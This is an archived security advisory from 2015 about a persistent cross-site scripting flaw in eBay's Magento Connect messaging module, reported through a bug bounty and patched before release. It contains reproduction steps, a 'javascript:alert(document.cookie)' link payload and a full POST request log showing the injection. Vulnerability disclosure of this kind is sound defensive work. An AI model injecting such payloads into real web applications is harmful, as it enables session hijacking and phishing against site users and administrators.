what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Ebay Magento Application-Side Cross Site Scripting

Ebay Magento Application-Side Cross Site Scripting
Posted Jul 2, 2015
Authored by Hadji Samir, Vulnerability Laboratory | Site vulnerability-lab.com

Ebay Magento suffered from a cross site scripting vulnerability.

tags | exploit, xss
SHA-256 | 1877bf2efd520a4e279c8cd2c6440a772f0767895e4283736ccc68c2ec1184ec

Ebay Magento Application-Side Cross Site Scripting

Change Mirror Download
Document Title:
===============
Ebay Magento Bug Bounty #14 - Persistent Description Vulnerability


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1463

EIBBP-31602


Release Date:
=============
2015-06-30


Vulnerability Laboratory ID (VL-ID):
====================================
1463


Common Vulnerability Scoring System:
====================================
3.8


Product & Service Introduction:
===============================
Magento is an open source e-commerce web application that was launched on March 31, 2008 under the name Bento. It was developed
by Varien (now Magento, a division of eBay) with help from the programmers within the open source community but is now owned
solely by eBay Inc. Magento was built using parts of the Zend Framework. It uses the entity-attribute-value (EAV) database model
to store data. In November 2013, W3Techs estimated that Magento was used by 0.9% of all websites.

Our team of security professionals works hard to keep Magento customer information secure. What`s equally important to protecting
this data? Our security researchers and user community. If you find a site that isn`t following our policies, or a vulnerability
inside our system, please tell us right away.

( Copy of the Vendor Homepage: http://magento.com/security & http://magento.com/security )


Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered an application-side cross site scripting web vulnerabilityin the Magento Commerce web-application.


Vulnerability Disclosure Timeline:
==================================
2015-03-17: Researcher Notification & Coordination (Hadji Samir)
2015-03-18: Vendor Notification (eBay Inc Security Team - Bug Bounty Program)
2015-04-03: Vendor Response/Feedback (eBay Inc Security Team - Bug Bounty Program)
2015-05-16: Vendor Fix/Patch (Magento Developer Team)
2015-06-30: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
Ebay Inc.
Product: Magento - Connect Web Application 2015 Q2


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Technical Details & Description:
================================
An application-side cross site scripting web vulnerability has been discovered in the official Magento Connect web-application.
The vulnerability allows remote attackers to inject own script code to the application-side of the affected application module.

Remote attackers are able to inject own script code to the url description link input of the send message module in magento-connect.
Remote attackers are able to inject in the profile description url own script code to compromise user/moderator/admin session data.
The request method to inject is POSt and the attack vector is located on the application-side of the affected module.

The security risk of the application-side cross site vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 3.8.
Exploitation of the persistent input validation web vulnerability requires a low privileged web-application user account and low or medium user interaction.
Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent external redirects to malicious source
and persistent manipulation of affected or connected application modules (api).

Vulnerable Service(s):
[+] Magento Connect

Vulnerable Module(s):
[+] send message magento-connect

Vulnerable Parameter(s):
[+] url link description


Proof of Concept (PoC):
=======================
The application-side vulnerability can be exploited by remote attackers with low privileged application user account and low user interaction.
For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.

Manual steps to reproduce the security vulnerability ...
1. Register an magento account
2. Login to the service
3. Surf to the profile service
4. Inject own script code payload with document.cookie/domain request to the url description input field
5. Save the input
6. The script code execution occurs in the next layer were the input is visible as profile
7. Successful reproduce of the security vulnerability!


POC: Exploitcode (js)
<div class="message-body">
<a href="javascript:alert(document.cookie)">Click Here To PWN!</a>
</div>


--- PoC Session Logs [POST] (Injection Point) ---
Host=www.magentocommerce.com
User-Agent=Mozilla/5.0 (X11; Linux i686; rv:37.0) Gecko/20100101 Firefox/37.0
Accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language=en-US,en;q=0.5
Accept-Encoding=gzip, deflate
Referer=https://www.magentocommerce.com/magento-connect/message/message/new/
Cookie=frontend=mucmgihjb2c5n8cr664a67khu1; optimizelySegments=%7B%22239237138%22%3A%22referral%22%2C%22237962548%22%3A%22ff%22%2C%22238367687%22%3A%22false%22%7D; optimizelyEndUserId=oeu1427859799829r0.9503229301677888; optimizelyBuckets=%7B%7D; s_fid=1EA04ABDF830C3FB-06BD2154AEEBE2E4; utm_src=expired; ClrSSID=1427859801483-7868; ClrOSSID=1427859801483-7868; ClrSCD=1427859801483; __utma=1.2070006379.1429867771.1429867771.1429867771.1; __utmz=1.1429867771.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fsr.r=%7B%22d%22%3A90%2C%22i%22%3A%22d5e2305-49168485-0768-7e1c-278cb%22%2C%22e%22%3A1428580157028%7D; exp_domain=c; exp_last_activity=1428276395; exp_last_visit=1112916395; frontend=mucmgihjb2c5n8cr664a67khu1; frontend=mucmgihjb2c5n8cr664a67khu1; s_cc=true; s_sq=magentocommerce%3D%2526pid%253Dhttps%25253A%25252F%25252Fwww.magentocommerce.com%25252Fmagento-connect%25252Fmessage%25252Fmessage%25252Fnew%25252F%2526oid%253DSend%2526oidt%253D3%2526ot%253DSUBMIT; interstitial=3; __utmb=1.28.10.1429867771; __utmc=1; __utmt=1; fsr.s=%7B%22v1%22%3A-1%2C%22v2%22%3A-2%2C%22rid%22%3A%22d5e2305-49770853-6038-f681-ff336%22%2C%22ru%22%3A%22https%3A%2F%2Fwww.magentocommerce.com%2Fproducts%2Fcustomer%2Faccount%2F%22%2C%22r%22%3A%22www.magentocommerce.com%22%2C%22st%22%3A%22%22%2C%22to%22%3A4%2C%22c%22%3A%22https%3A%2F%2Fwww.magentocommerce.com%2Fmagento-connect%2Fmessage%2Fmessage%2Fnew%2F%22%2C%22pv%22%3A28%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A28%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22f%22%3A1429868137633%2C%22sd%22%3A0%7D
X-Forwarded-For=8.8.8.8
Connection=keep-alive
Content-Type=multipart/form-data; boundary=---------------------------41839648315458962981735021917
Content-Length=1049
POSTDATA =-----------------------------41839648315458962981735021917
Content-Disposition: form-data; name="to"
addext01
-----------------------------41839648315458962981735021917
Content-Disposition: form-data; name="subjects"
test
-----------------------------41839648315458962981735021917
Content-Disposition: form-data; name="description"
<a href="javascript:alert(document.cookie)">click here</a>
-----------------------------41839648315458962981735021917
Content-Disposition: form-data; name="extension_url"

-----------------------------41839648315458962981735021917
Content-Disposition: form-data; name="parent_message_id"
0
-----------------------------41839648315458962981735021917
Content-Disposition: form-data; name="prevent_click"
0
-----------------------------41839648315458962981735021917
Content-Disposition: form-data; name="draft"
0
-----------------------------41839648315458962981735021917
Content-Disposition: form-data; name="send"
0
-----------------------------41839648315458962981735021917--


Reference(s):
https://www.magentocommerce.com/
https://www.magentocommerce.com/magento-connect/message/
https://www.magentocommerce.com/magento-connect/message/message/new/


Security Risk:
==============
The security risk of the application-side cross site scripting web vulnerability in the url description is estimated as medium. (CVSS 3.8)


Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Hadji Samir [s-dz@hotmail.fr]


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses,
policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.

Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™

--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt


Login or Register to add favorites

File Archive:

July 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    27 Files
  • 2
    Jul 2nd
    10 Files
  • 3
    Jul 3rd
    35 Files
  • 4
    Jul 4th
    27 Files
  • 5
    Jul 5th
    18 Files
  • 6
    Jul 6th
    0 Files
  • 7
    Jul 7th
    0 Files
  • 8
    Jul 8th
    28 Files
  • 9
    Jul 9th
    44 Files
  • 10
    Jul 10th
    24 Files
  • 11
    Jul 11th
    25 Files
  • 12
    Jul 12th
    11 Files
  • 13
    Jul 13th
    0 Files
  • 14
    Jul 14th
    0 Files
  • 15
    Jul 15th
    28 Files
  • 16
    Jul 16th
    6 Files
  • 17
    Jul 17th
    34 Files
  • 18
    Jul 18th
    6 Files
  • 19
    Jul 19th
    34 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    19 Files
  • 23
    Jul 23rd
    17 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close